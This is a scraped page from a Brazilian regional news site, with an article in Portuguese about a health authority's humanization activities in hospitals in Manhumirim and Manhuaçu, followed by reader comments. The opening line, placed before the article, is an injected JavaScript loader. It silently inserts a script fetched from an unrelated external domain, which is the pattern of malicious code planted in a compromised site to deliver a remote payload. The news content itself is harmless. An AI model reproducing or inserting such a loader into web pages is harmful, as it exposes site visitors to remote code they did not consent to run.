;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); GRS Manhumirim promove alegria no Dia Nacional de Humanização - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

GRS Manhumirim promove alegria no Dia Nacional de Humanização

O Grupo de Trabalho em Humanização (GTH) da Gerência Regional de Saúde de Manhumirim promoveu um dia diferente aos pacientes dos hospitais Pe. Júlio Maria de Manhumirim e Hospital César Leite de Manhuaçu, em comemoração ao Dia Nacional de Humanização (29 de dezembro).

O objetivo da mobilização foi proporcionar tanto aos pacientes quanto aos profissionais das Instituições um pouco de alegria através de músicas e trocas de afetos. Foi entregue ainda a todos os presentes uma pequena lembrança onde constava uma mensagem sobre Humanização.

Irmã Conceição, do Hospital Pe. Júlio Maria,destacou a importância do tema. “A Humanização precisa ser trabalhada no dia-a-dia e ações como está nos motiva a sermos mais humanos.”

“Através da Política de Humanização pretendemos garantir o atendimento com qualidade aos usuários, assim como a melhoria das condições de trabalho dos profissionais do HCL”, observou Edna Estanislau, referência técnica em Humanização do Hospital César Leite de Manhuaçu.

A servidora da GRS Manhumirim, Andréa Mendonça, enfatizou  “a princípio pensou-se em trabalhar os sentimentos dos outros, no entanto nós ficamos surpreendidos, porque fomos os maiores beneficiados”.

Texto e imagens

Andressa Aguiar

Ofertas

[secvitrine/bicicletas/22677]

6 thoughts on “GRS Manhumirim promove alegria no Dia Nacional de Humanização

  1. moro em Juiz de Fora….achei o máximo essa ação,a humanização realmente é importantíssima…com certeza tem que ser cada vez mais divulgado!
    Parabéns a todos por essa atitude!

  2. Este tipo de trabalho deve com certeza ser divulgado e tbém imitado, pois não só quem precisa de estímulo e alegrias mas contamina que faz trazendo alegria e harmonia em sua convivência.

  3. Que açao linda o GTH da GRS Manhumirim promoveu!
    Parabens a todos e ao Portal Carangola por publicarem!

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.